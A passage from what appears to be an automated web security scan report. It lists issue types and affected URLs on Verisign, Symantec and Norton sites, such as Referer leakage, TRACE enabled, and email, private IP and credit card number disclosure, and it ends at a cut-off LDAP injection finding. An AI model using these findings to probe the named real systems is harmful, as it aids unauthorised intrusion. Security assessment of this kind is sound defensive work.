13.1. https://knowledge.verisign.ch/support/code-signing-support/index.html
13.2. https://knowledge.verisign.ch/support/code-signing-support/index.html
13.3. https://knowledge.verisign.ch/support/code-signing-support/index.html
13.4. https://knowledge.verisign.ch/support/digital-id-support/index.html
13.5. https://knowledge.verisign.ch/support/digital-id-support/index.html
13.6. https://knowledge.verisign.ch/support/mpki-support/index.html
13.7. https://knowledge.verisign.ch/support/mpki-support/index.html
13.8. https://knowledge.verisign.ch/support/ssl-certificates-support/index
13.9. https://knowledge.verisign.ch/support/ssl-certificates-support/index
13.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
13.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
13.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
13.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html
13.14. https://knowledge.verisign.ch/support/trust-seal-support/index.html
13.15. http://query.verisign.ch/search
13.16. http://query.verisign.ch/search
13.17. https://renewals.symantec.com/renewals/chat_form.jsp
13.18. http://www.verisign.ch/
13.19. http://www.verisign.ch/
13.20. http://www.verisign.ch/contact-information/index.html
13.21. http://www.verisign.ch/contact-information/index.html
13.22. http://www.verisign.ch/corporate/index.html
13.23. http://www.verisign.ch/corporate/index.html
13.24. http://www.verisign.ch/trust-seal/index.html
13.25. http://www.verisign.ch/trust-seal/index.html
14. Cross-domain Referer leakage
14.1. http://blogs.verisign.com/
14.2. http://buy.norton.com/estore/mf/landingProductFeatures
14.3. http://buy.norton.com/estore/mf/upgradeRenewal
14.4. http://community.norton.com/norton/
14.5. http://investor.symantec.com/phoenix.zhtml
14.6. http://investor.symantec.com/phoenix.zhtml
14.7. https://knowledge.verisign.ch/support/code-signing-support/index.html
14.8. https://knowledge.verisign.ch/support/digital-id-support/index.html
14.9. https://knowledge.verisign.ch/support/mpki-support/index.html
14.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index
14.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
14.12. https://knowledge.verisign.ch/support/trust-seal-support/index.html
14.13. https://knowledge.verisign.com/support/code-signing-support/index
14.14. https://knowledge.verisign.com/support/code-signing-support/index.html
14.15. https://knowledge.verisign.com/support/digital-id-support/index.html
14.16. https://knowledge.verisign.com/support/eca-support/index.html
14.17. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
14.18. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
14.19. https://knowledge.verisign.com/support/mpki-support/index.html
14.20. https://knowledge.verisign.com/support/ssl-certificates-support/index
14.21. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
14.22. https://knowledge.verisign.com/support/trust-seal-support/index.html
14.23. https://onlinefamily.norton.com/familysafety/loginStart.fs
14.24. http://player.ooyala.com/player.js
14.25. http://query.verisign.com/search
14.26. http://searchg.symantec.com/search
14.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch
14.28. http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200
14.29. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq
14.30. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/
14.31. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/
14.32. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/
14.33. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7
14.34. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/
14.35. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400
14.36. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/
14.37. http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300
14.38. https://ssl-certificate-center.verisign.ch/process/retail/console_login
14.39. https://ssl-certificate-center.verisign.com/process/retail/console_login
14.40. http://store.symantec.com/
14.41. https://symantec-corporation.com/servlet/campaignrespondent
14.42. https://trust-center.verisign.ch/process/retail/console_login
14.43. https://trust-center.verisign.com/process/retail/console_login
14.44. https://trust-center.verisign.com/process/retail/trust_product_selector
14.45. http://updatecenter.norton.com/
14.46. http://us.norton.com/beta/index.jsp
14.47. http://us.norton.com/beta/overview.jsp
14.48. http://us.norton.com/norton-utilities/
14.49. http://us.norton.com/nortonlive/spyware-virus-removal.jsp
14.50. http://us.norton.com/products/charts/comparison.jsp
14.51. http://us.norton.com/support/DIY/index.jsp
14.52. http://us.norton.com/support/dtree.jsp
14.53. http://us.norton.com/theme.jsp
14.54. http://us.norton.com/theme.jsp
14.55. http://us.norton.com/theme4.jsp
14.56. http://www.symantec.com/business/products/categories.jsp
14.57. http://www.symantec.com/business/products/purchasing.jsp
14.58. http://www.symantec.com/business/theme.jsp
14.59. http://www.symantec.com/business/verisign/fraud-detection-service
14.60. http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp
14.61. http://www.symantec.com/store/products/index.jsp
14.62. http://www.symantec.com/store/resources/index.jsp
14.63. http://www.symantec.com/store/services/index.jsp
14.64. http://www.verisign.ch/
14.65. http://www.verisign.ch/contact-information/index.html
14.66. http://www.verisign.ch/corporate/index.html
14.67. http://www.verisign.ch/trust-seal/index.html
14.68. http://www.verisign.com/code-signing/index.html
14.69. http://www.verisign.com/trust-seal/index.html
14.70. http://www.verisign.com/verisign-worldwide/index.html
15. Cross-domain script include
15.1. http://blogs.verisign.com/web-user-experience/
15.2. http://community.norton.com/norton/
15.3. http://community.norton.com/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline
15.4. http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1
15.5. http://de.community.norton.com/
15.6. http://free.pctools.com/free-antivirus/
15.7. http://investor.symantec.com/phoenix.zhtml
15.8. https://knowledge.verisign.ch/support/code-signing-support/index.html
15.9. https://knowledge.verisign.ch/support/digital-id-support/index.html
15.10. https://knowledge.verisign.ch/support/mpki-support/index.html
15.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index
15.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
15.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html
15.14. http://query.verisign.ch/search
15.15. https://securitycenter.verisign.com/celp/enroll/outsideSearch
15.16. https://ssl-certificate-center.verisign.ch/process/retail/console_login
15.17. https://ssl-certificate-center.verisign.com/process/retail/console_login
15.18. http://store.symantec.com/
15.19. https://symantec-corporation.com/servlet/campaignrespondent
15.20. https://trust-center.verisign.ch/process/retail/console_login
15.21. https://trust-center.verisign.com/process/retail/console_login
15.22. https://trust-center.verisign.com/process/retail/help_and_support
15.23. https://trust-center.verisign.com/process/retail/trust_product_selector
15.24. http://us.norton.com/360
15.25. http://us.norton.com/downloads/index.jsp
15.26. http://us.norton.com/familyresources/index.jsp
15.27. http://us.norton.com/nortonlive/
15.28. http://us.norton.com/nortonlive/spyware-virus-removal.jsp
15.29. http://us.norton.com/products/index.jsp
15.30. http://us.norton.com/security_response/index.jsp
15.31. http://www.symantec.com/connect/
15.32. http://www.verisign.ch/
15.33. http://www.verisign.ch/contact-information/index.html
15.34. http://www.verisign.ch/corporate/index.html
15.35. http://www.verisign.ch/trust-seal/index.html
15.36. http://www.verisign.com/
15.37. http://www.verisign.com/code-signing/index.html
15.38. http://www.verisign.com/partners/ssl-reseller-programs/index.html
15.39. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
15.40. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
15.41. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
15.42. http://www.verisign.com/trust-seal/index.html
15.43. http://www.verisign.com/verisign-worldwide/index.html
15.44. https://www.verisign.com/
15.45. https://www.verisign.com/products-services/index.html
16. TRACE method is enabled
16.1. http://1168.ic-live.com/
16.2. http://blogs.verisign.com/
16.3. https://cert.webtrust.org/
16.4. https://donate.mozilla.org/
16.5. https://partnernet.symantec.com/
16.6. http://press.verisign.com/
16.7. https://press.verisign.com/
17. Email addresses disclosed
17.1. http://blogs.verisign.com/
17.2. http://blogs.verisign.com/web-user-experience/
17.3. http://cdn.verisign.com/assets/shared/js/jquery.cookie.js
17.4. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
17.5. https://enterprise-ssl-admin.verisign.com/
17.6. https://fileconnect.symantec.com/javascript/calendar2.js
17.7. https://idprotect.verisign.com/learnmore.v
17.8. https://idprotect.verisign.com/orderstart.v
17.9. https://idprotect.verisign.com/toolbar/activate.v
17.10. https://idprotect.verisign.com/toolbar/download.v
17.11. https://idprotect.verisign.com/toolbar/home.v
17.12. https://idprotect.verisign.com/toolbar/install.v
17.13. https://idprotect.verisign.com/wheretouse.v
17.14. https://knowledge.verisign.ch/support/code-signing-support/index.html
17.15. https://knowledge.verisign.ch/support/digital-id-support/index.html
17.16. https://knowledge.verisign.ch/support/mpki-support/index.html
17.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index
17.18. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
17.19. https://knowledge.verisign.ch/support/trust-seal-support/index.html
17.20. https://knowledge.verisign.com/apps/infocenter/sites/verisign/js/jquery.hover_intent.js
17.21. https://knowledge.verisign.com/support/code-signing-support/index
17.22. https://knowledge.verisign.com/support/code-signing-support/index.html
17.23. https://knowledge.verisign.com/support/digital-id-support/index.html
17.24. https://knowledge.verisign.com/support/eca-support/index.html
17.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js
17.26. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
17.27. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
17.28. https://knowledge.verisign.com/support/mpki-support/index.html
17.29. https://knowledge.verisign.com/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js
17.30. https://knowledge.verisign.com/support/ssl-certificates-support/index
17.31. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
17.32. https://knowledge.verisign.com/support/trust-seal-support/index.html
17.33. http://partnerlocator.symantec.com/static/prod_plocator_s_code.js
17.34. https://policy3.responsys.net/privacy.htm
17.35. https://press.verisign.com/easyir/customrel.do
17.36. http://query.verisign.ch/search
17.37. http://query.verisign.com/cluster.js
17.38. http://query.verisign.com/common.js
17.39. http://query.verisign.com/search
17.40. http://query.verisign.com/uri.js
17.41. https://query.verisign.com/search
17.42. https://renewals.symantec.com/renewals/chat_form.jsp
17.43. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js
17.44. http://us.norton.com/beta/overview.jsp
17.45. http://us.norton.com/familyresources/index.jsp
17.46. http://us.norton.com/scripts/colorbox/norton/jquery.colorbox-min.js
17.47. https://vipmanager.verisign.com/vipmgr/createtrialaccount.v
17.48. http://vipmobile.verisign.com/home.v
17.49. https://vipmobile.verisign.com/home.v
17.50. https://vipmobile.verisign.com/supportedphones.v
17.51. https://www-secure.symantec.com/about/profile/policies/privacy.jsp
17.52. http://www.symantec.com/business/theme.jsp
17.53. http://www.symantec.com/connect/
17.54. http://www.symantec.com/searchg/common.js
17.55. http://www.symantec.com/searchg/uri.js
17.56. http://www.verisign.ch/
17.57. http://www.verisign.ch/contact-information/index.html
17.58. http://www.verisign.ch/corporate/index.html
17.59. http://www.verisign.ch/trust-seal/index.html
17.60. http://www.verisign.com/
17.61. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
17.62. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
17.63. http://www.verisign.com/code-signing/index.html
17.64. http://www.verisign.com/partners/ssl-reseller-programs/index.html
17.65. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
17.66. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
17.67. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
17.68. http://www.verisign.com/trust-seal/index.html
17.69. http://www.verisign.com/verisign-worldwide/index.html
17.70. https://www.verisign.com/
17.71. https://www.verisign.com/products-services/index.html
18. Private IP addresses disclosed
18.1. http://query.verisign.com/cluster.js
18.2. http://query.verisign.com/search
18.3. https://query.verisign.com/search
19. Credit card numbers disclosed
19.1. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js
19.2. http://us.norton.com/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf
20. Robots.txt file
20.1. http://1168.ic-live.com/goat.php
20.2. http://admin.instantservice.com/resources/smartbutton/5851/42379/available.gif
20.3. https://admin.instantservice.com/links/5851/14753
20.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png
20.5. http://buy-static.norton.com/estore/images/master/misc/gradient_background.gif
20.6. https://buy-static.norton.com/estore/images/en/Non-Product/Misc/LiveChat/
20.7. http://buy.norton.com/
20.8. http://cdn.verisign.com/assets/trust-seal/css/hp.css
20.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
20.10. http://ch.norton.com/
20.11. http://com-verisign.netmng.com/
20.12. http://community.norton.com/norton/
20.13. http://de.community.norton.com/
20.14. https://drh.img.digitalriver.com/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/
20.15. http://gs.instantservice.com/geoipAPI.js
20.16. http://investor.symantec.com/phoenix.zhtml
20.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
20.18. https://knowledge.verisign.com/favicon.ico
20.19. http://l.addthiscdn.com/live/t00/200lo.gif
20.20. http://mbox3.offermatica.com/m2/verisign/ubox/image
20.21. http://om.symantec.com/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836
20.22. http://partnerlocator.symantec.com/public/search
20.23. http://player.ooyala.com/player.js
20.24. http://productadvisor.symantec.com/app/en/US/adirect/symantec
20.25. https://products.geotrust.com/signup/codesign.do
20.26. https://products.verisign.com/geocenter/reseller/logon.do
20.27. http://query.verisign.ch/search
20.28. http://query.verisign.com/search
20.29. https://query.verisign.com/search
20.30. http://rs.instantservice.com/resources/smartbutton/5851/II3_Servers.js
20.31. http://searchg.symantec.com/search
20.32. https://ssl-certificate-center.verisign.ch/process/retail/console_login
20.33. https://ssl-certificate-center.verisign.com/process/retail/console_login
20.34. https://symantec-corporation.com/servlet/campaignrespondent
20.35. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
20.36. https://test-products.verisign.com/geocenter/reseller/logon.do
20.37. https://trust-center.verisign.ch/process/retail/trust_initial
20.38. https://trust-center.verisign.com/process/retail/trust_initial
20.39. http://twitter.com/statuses/user_timeline/pctools.json
20.40. http://us.norton.com/index.jsp
20.41. https://us.norton.com/index.jsp
20.42. https://www-secure.symantec.com/feedback/webmaster.jsp
20.43. http://www.google-analytics.com/__utm.gif
20.44. http://www.symantec.com/scripts/swfobject.js
20.45. http://www.verisign.ch/
20.46. http://www.verisign.com/
20.47. https://www.verisign.com/products/site/
21. Cacheable HTTPS response
21.1. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
21.2. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
21.3. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
21.4. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
21.5. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
21.6. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
21.7. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
21.8. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
21.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
21.10. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
21.11. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
21.12. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
21.13. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
21.14. https://cert.webtrust.org/ViewSeal
21.15. https://fileconnect.symantec.com/
21.16. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer
21.17. https://idprotect.verisign.com/common/scripts/dlText.js
21.18. https://idprotect.verisign.com/secureredirect.v
21.19. https://idprotect.verisign.com/toolbar/downloadIE.v
21.20. https://knowledge.verisign.ch/support/code-signing-support/index.html
21.21. https://knowledge.verisign.ch/support/digital-id-support/index.html
21.22. https://knowledge.verisign.ch/support/mpki-support/index.html
21.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index
21.24. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
21.25. https://knowledge.verisign.ch/support/trust-seal-support/index.html
21.26. https://knowledge.verisign.com/favicon.ico
21.27. https://knowledge.verisign.com/support/code-signing-support/index
21.28. https://knowledge.verisign.com/support/code-signing-support/index.html
21.29. https://knowledge.verisign.com/support/digital-id-support/index.html
21.30. https://knowledge.verisign.com/support/eca-support/index.html
21.31. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
21.32. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
21.33. https://knowledge.verisign.com/support/mpki-support/index.html
21.34. https://knowledge.verisign.com/support/ssl-certificates-support/index
21.35. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
21.36. https://knowledge.verisign.com/support/trust-seal-support/index.html
21.37. https://partnernet.symantec.com/
21.38. https://policy3.responsys.net/
21.39. https://policy3.responsys.net/permission.htm
21.40. https://policy3.responsys.net/privacy.htm
21.41. https://press.verisign.com/easyir/customrel.do
21.42. https://products.verisign.com/geocenter/reseller/doregister.do
21.43. https://products.verisign.com/geocenter/reseller/logon.do
21.44. https://products.verisign.com/geocenter/reseller/logon.jsp
21.45. https://products.verisign.com/geocenter/reseller/register.do
21.46. https://query.verisign.com/search
21.47. https://renewals.symantec.com/renewals/application
21.48. https://renewals.symantec.com/renewals/chat_form.jsp
21.49. https://renewals.symantec.com/renewals/chat_norton.jsp
21.50. https://renewals.symantec.com/renewals/renewal_search.jsp
21.51. https://renewals.symantec.com/renewals/symantec_where_sn.jsp
21.52. https://seal.verisign.com/getseal
21.53. https://securitycenter.verisign.com/
21.54. https://securitycenter.verisign.com/celp/enroll/outsideSearch
21.55. https://test-products.verisign.com/geocenter/reseller/logon.do
21.56. https://us.norton.com/index.jsp
21.57. https://vipmobile.verisign.com/home.v
21.58. https://vipmobile.verisign.com/supportedphones.v
21.59. https://www-secure.symantec.com/
21.60. https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp
21.61. https://www-secure.symantec.com/about/profile/policies/legal.jsp
21.62. https://www-secure.symantec.com/about/profile/policies/privacy.jsp
21.63. https://www-secure.symantec.com/business/theme.jsp
21.64. https://www-secure.symantec.com/feedback/contactus.jsp
21.65. https://www-secure.symantec.com/feedback/webmaster.jsp
21.66. https://www-secure.symantec.com/globalsites/index.jsp
21.67. https://www-secure.symantec.com/index.jsp
21.68. https://www-secure.symantec.com/rss/index.jsp
21.69. https://www-secure.symantec.com/sitemap/index.jsp
21.70. https://www.verisign.com/
21.71. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
21.72. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
21.73. https://www.verisign.com/products-services/index.html
22. HTML does not specify charset
22.1. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff
22.2. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
22.3. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
22.4. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
22.5. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
22.6. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
22.7. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
22.8. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
22.9. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
22.10. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
22.11. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
22.12. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
22.13. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
22.14. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
22.15. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
22.16. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
22.17. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
22.18. https://cert.webtrust.org/ViewSeal
22.19. https://enterprise-ssl-admin.verisign.com/
22.20. https://fileconnect.symantec.com/
22.21. https://fileconnect.symantec.com/favicon.ico
22.22. https://fileconnect.symantec.com/javascript/common.js
22.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index
22.24. https://knowledge.verisign.com/support/code-signing-support/index
22.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
22.26. https://knowledge.verisign.com/support/ssl-certificates-support/index
22.27. http://partnerlocator.symantec.com/
22.28. http://partnerlocator.symantec.com/public/product_finder
22.29. http://partnerlocator.symantec.com/public/pulldown_list
22.30. http://partnerlocator.symantec.com/public/search
22.31. https://partnernet.symantec.com/
22.32. http://player.ooyala.com/info/primary/
22.33. https://policy3.responsys.net/
22.34. https://renewals.symantec.com/renewals/chat_norton.jsp
22.35. https://securitycenter.verisign.com/
22.36. https://securitycenter.verisign.com/celp/enroll/orderStatus
22.37. https://securitycenter.verisign.com/celp/enroll/outsideSearch
22.38. https://securitycenter.verisign.com/celp/enroll/retail
22.39. https://securitycenter.verisign.com/celp/enroll/upsell
22.40. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
22.41. http://www.verisign.ch/
22.42. http://www.verisign.ch/assets/global/js/leftnav.js
22.43. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js
22.44. http://www.verisign.ch/assets/shared/js/leftnav_new.js
22.45. http://www.verisign.ch/corporate/index.html
22.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
22.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
22.48. http://www.verisign.com/
22.49. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js
22.50. http://www.verisign.com/authweb/global/assets/header/js/header.js
22.51. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
22.52. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico
22.53. http://www.verisign.com/authweb/global/assets/shared/js/globals.js
22.54. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
22.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
22.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
22.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
22.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js
22.59. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
22.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js
22.61. https://www.verisign.com/
22.62. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
22.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
23. Content type incorrectly stated
23.1. http://ak.c.ooyala.com/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7
23.2. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff
23.3. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
23.4. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
23.5. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
23.6. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
23.7. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
23.8. http://cdn.verisign.com/stellent/groups/public/documents/image/dev041741.jpg
23.9. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
23.10. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
23.11. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
23.12. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
23.13. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
23.14. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
23.15. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
23.16. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
23.17. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
23.18. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
23.19. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
23.20. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
23.21. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
23.22. https://cert.webtrust.org/ViewSeal
23.23. http://com-verisign.netmng.com/
23.24. https://fileconnect.symantec.com/images/Sigstand.jpg
23.25. http://free.pctools.com/favicon.ico
23.26. http://gs.instantservice.com/geoipAPI.js
23.27. https://idprotect.verisign.com/common/scripts/dlText.js
23.28. https://idprotect.verisign.com/imageapp.v
23.29. https://idprotect.verisign.com/membersites.v
23.30. https://knowledge.verisign.com/favicon.ico
23.31. http://mbox3.offermatica.com/m2/verisign/mbox/standard
23.32. http://partnerlocator.symantec.com/public/product_finder
23.33. http://partnerlocator.symantec.com/public/pulldown_list
23.34. http://player.ooyala.com/info/primary/
23.35. http://player.ooyala.com/sas/authorized
23.36. http://query.verisign.com/cluster
23.37. http://sales.liveperson.net/hcp/html/mTag.js
23.38. https://seal.verisign.com/getseal
23.39. http://sr2.liveperson.net/hcp/html/mTag.js
23.40. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico
23.41. http://www.symantec.com/s/searchg/suggest
23.42. http://www.symantec.com/search/searchjs.jsp
23.43. http://www.verisign.ch/assets/global/js/leftnav.js
23.44. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js
23.45. http://www.verisign.ch/assets/shared/js/leftnav_new.js
23.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
23.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
23.48. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js
23.49. http://www.verisign.com/authweb/global/assets/header/js/header.js
23.50. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
23.51. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico
23.52. http://www.verisign.com/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg
23.53. http://www.verisign.com/authweb/global/assets/shared/images/ps-freetrial-promo.jpg
23.54. http://www.verisign.com/authweb/global/assets/shared/js/globals.js
23.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
23.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
23.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
23.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
23.59. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js
23.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
23.61. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js
23.62. http://www.verisign.com/stellent/groups/public/documents/image/dev041741.jpg
23.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
23.64. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
24. Content type is not specified
24.1. https://fileconnect.symantec.com/javascript/calendar2.js
24.2. https://fileconnect.symantec.com/javascript/s_code.js
24.3. https://fileconnect.symantec.com/javascript/validations.js
24.4. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer
24.5. http://l.player.ooyala.com/verify
24.6. https://renewals.symantec.com/renewals/js/InstantInvite3.js
24.7. https://renewals.symantec.com/renewals/js/commonFunctions.js
24.8. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js
24.9. https://renewals.symantec.com/renewals/js/dhtmlwindow.js
24.10. https://renewals.symantec.com/renewals/js/getPageNames.js
24.11. https://renewals.symantec.com/renewals/js/modal.js
24.12. https://renewals.symantec.com/renewals/js/mySymantecDevKit.js
24.13. https://renewals.symantec.com/renewals/js/s_2_code_symc_cust_prod.js
24.14. https://renewals.symantec.com/renewals/js/symantec_omniture/mysymc_code_util.js
24.15. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js
24.16. http://us.norton.com/www-uat.ges.sym
24.17. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/
24.18. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/
24.19. http://www.symantec.com/business/verisign/fraud-detection-service
1. LDAP injection
next
There are 12 instances of this issue:
Issue background
